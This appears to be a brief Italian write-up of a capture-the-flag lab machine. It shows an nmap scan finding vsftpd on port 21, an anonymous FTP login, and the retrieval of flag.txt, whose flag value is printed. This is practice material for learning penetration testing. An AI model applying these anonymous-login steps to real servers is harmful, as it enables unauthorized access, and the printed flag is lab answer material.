IP: 10.129.190.91
--------------
ping 10.129.190.91 controllo se mi riesco a connettere
-------------
con nmap controllo i servizi e le porte aperte

sudo nmap -sV 10.129.190.91 
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 05:19 EDT
Nmap scan report for 10.129.190.91
Host is up (0.044s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
Service Info: OS: Unix

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1.23 seconds

noto la porta 21 aperta con un servizio ftp
-----------------------
uso il tool ftp per connetermi, una configurazione sbagliata di solito si trova sull'account anonymous, questo account permette l'accesso con qualsiasi password

ftp 10.129.190.91
Connected to 10.129.190.91.
220 (vsFTPd 3.0.3)
Name (10.129.190.91:kali): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> 
-------------------
con help vedo la lista di comandi disponibili
---------------
vedo cosa è presente nella directory

ftp> ls
229 Entering Extended Passive Mode (|||28580|)
150 Here comes the directory listing.
-rw-r--r--    1 0        0              32 Jun 04  2021 flag.txt
226 Directory send OK.
------------------
mi scarico il file in locale

get flag.txt
local: flag.txt remote: flag.txt
229 Entering Extended Passive Mode (|||24373|)
150 Opening BINARY mode data connection for flag.txt (32 bytes).
100% |**********************************************************************|    32        0.38 KiB/s    00:00 ETA
226 Transfer complete.
32 bytes received in 00:00 (0.16 KiB/s)
-------------------
in fine lo apro

cat flag.txt 
035db21c881520061c53e0536e44f815   

